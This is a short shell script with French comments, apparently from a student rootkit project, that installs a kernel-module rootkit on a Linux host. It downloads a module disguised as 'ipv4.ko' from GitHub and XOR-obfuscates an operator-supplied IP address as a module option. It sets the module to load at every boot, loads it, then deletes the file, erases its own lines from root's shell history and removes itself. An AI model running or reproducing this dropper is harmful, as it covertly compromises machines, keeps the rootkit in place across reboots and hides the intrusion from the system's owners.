#!/bin/ash

# récuperer le .ko
wget https://github.com/gobelinor/Rootkit-Project/raw/refs/heads/dev_tibo/mesmodules/ipv4.ko

# ajout de ip personnalisé
echo "Tape ton ip:"
read IP_ADDR
if [ -z "$IP_ADDR" ]; then
  echo "ip adresse vide."
  exit 1
fi

key=126

# XOR chaque caractère de l'ip
xor_encrypt() {
    input="$1"
    key="$2"
    result=""
    i=0
    input_len=${#input}
    while [ "$i" -lt "$input_len" ]; do
        char=$(printf '%d' "'${input:$i:1}")
        xor_char=$(( char ^ key ))
        result="$result$(printf '\\%03o' "$xor_char")"
        i=$(( i + 1 ))
    done
    # Interpréter les séquences octales et produire les caractères
    printf "%b" "$result"
}

# Appliquer le XOR et afficher les résultats
encrypted=$(xor_encrypt "$IP_ADDR" "$key")

# persistence (load le module au demarage)
echo "ipv4" >> /etc/modules
mkdir -p /lib/modules/$(uname -r)/extra
echo "options ipv4 ip=$encrypted" > /etc/modprobe.d/ipv4.conf
cp ipv4.ko /lib/modules/$(uname -r)/extra/
depmod -a

# load le module
modprobe ipv4

# supprimer les traces
rm ipv4.ko
sed -i '/ipv4/d' /root/.ash_history
sed -i '/insertion/d' /root/.ash_history
rm insertion_script
